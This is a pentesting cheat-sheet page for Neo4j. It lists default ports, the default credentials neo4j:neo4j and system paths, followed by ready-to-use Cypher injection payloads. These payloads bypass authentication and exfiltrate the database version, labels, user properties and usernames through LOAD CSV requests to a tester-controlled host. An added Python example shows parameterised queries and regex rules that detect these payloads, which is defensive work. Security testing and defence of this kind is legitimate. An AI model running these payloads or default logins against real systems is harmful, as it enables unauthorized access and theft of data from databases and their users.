# Neo4j Pentesting

#### Neo4j is a graph database management system developed by Neo4j. Default ports are 6362 (Backup), 7474 (HTTP), 7473 (HTTPS), 7687 (Bolt).

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```shellscript
neo4j:neo4j
```

### Common Directories & Files in Local System <a href="#common-directories-files-in-local-system" id="common-directories-files-in-local-system"></a>

```shellscript
/etc/neo4j
/var/lib/neo4j
/var/log/neo4j
```

### Cypher Injection <a href="#cypher-injection" id="cypher-injection"></a>

Before injecting payloads, start a local web server to receive the results of the query.

```shellscript
sudo python3 -m http.server 80
```

The payloads are listed below.\
Where a payload contains **`10.0.0.1`**, replace it with your local IP address.

```shellscript
<!-- Get Neo4j version -->
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.0.0.1/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

<!-- Get labels -->
' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM 'http://10.0.0.1/?label='+label as l RETURN 0 as _0 //

<!-- Get properties of the key -->
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.0.1/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

<!-- Authentication Bypass -->
' OR 1=1 WITH 1 as a MATCH (n) WHERE n.name = "admin" and n.password = 1 OR 1=1 RETURN n LIMIT 0; //

<!-- Get username (assume that the label name is 'User') -->
' OR 1=1 WITH 1 as a MATCH (u:User) LOAD CSV FROM 'http://10.0.0.1/?value=' + toString(u.name) as l RETURN 0 as _0; //
```

For a more detailed cheat sheet, see [Cypher Injection Cheat Sheet](https://pentester.land/blog/cypher-injection-cheatsheet/#authentication-bypass).
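The following is an added example, not part of the original page: it passes the "Get labels" payload above through a hypothetical lookup query built once by string concatenation and once with a bound parameter, then applies review rules that flag the injected shape in query text. The lookup query, function names and rule names are assumptions; no driver or database is needed to run it.

```python
import re

# Hypothetical application lookup (assumption): name comes from a login form.
def build_unsafe(name):
    """Vulnerable: input is concatenated into the Cypher text."""
    return "MATCH (u:User) WHERE u.name = '" + name + "' RETURN u", {}

def build_safe(name):
    """Hardened: constant query text; input is bound as the $name parameter."""
    return "MATCH (u:User) WHERE u.name = $name RETURN u", {"name": name}

# Review rules for Cypher text seen in query logs or an application audit hook.
RULES = {
    # LOAD CSV whose remote URL is assembled with '+': data leaving via the URL.
    "load-csv-url-concat": re.compile(
        r"LOAD\s+CSV\s+FROM\s+'(?:https?|ftp)://[^']*'\s*\+", re.I),
    # Schema/version procedures combined with LOAD CSV in one statement.
    "metadata-into-load-csv": re.compile(
        r"CALL\s+(?:dbms\.components|db\.labels)\(\).*LOAD\s+CSV", re.I | re.S),
    # Always-true predicate followed by WITH, which starts a new query part.
    "tautology-then-with": re.compile(r"\bOR\s+1\s*=\s*1\s+WITH\b", re.I),
    # '//' comment (not the slashes of a URL scheme) swallowing the query tail.
    "trailing-comment": re.compile(r"(?<![:/])//[^\n]*$"),
}

def findings(cypher):
    """Return the sorted names of all rules the query text matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cypher))

# Payload copied from the page's "Get labels" entry; 10.0.0.1 is its placeholder.
PAYLOAD = ("' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM "
           "'http://10.0.0.1/?label='+label as l RETURN 0 as _0 //")

if __name__ == "__main__":
    for builder in (build_unsafe, build_safe):
        query, params = builder(PAYLOAD)
        print(builder.__name__, findings(query), params)
```

With concatenation the payload becomes part of the statement and every rule fires; with the bound parameter the query text never changes and the payload is only ever compared as a string value.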

### References <a href="#references" id="references"></a>

* [HackTricks](https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j)
* [PentesterLand](https://pentester.land/blog/cypher-injection-cheatsheet/)
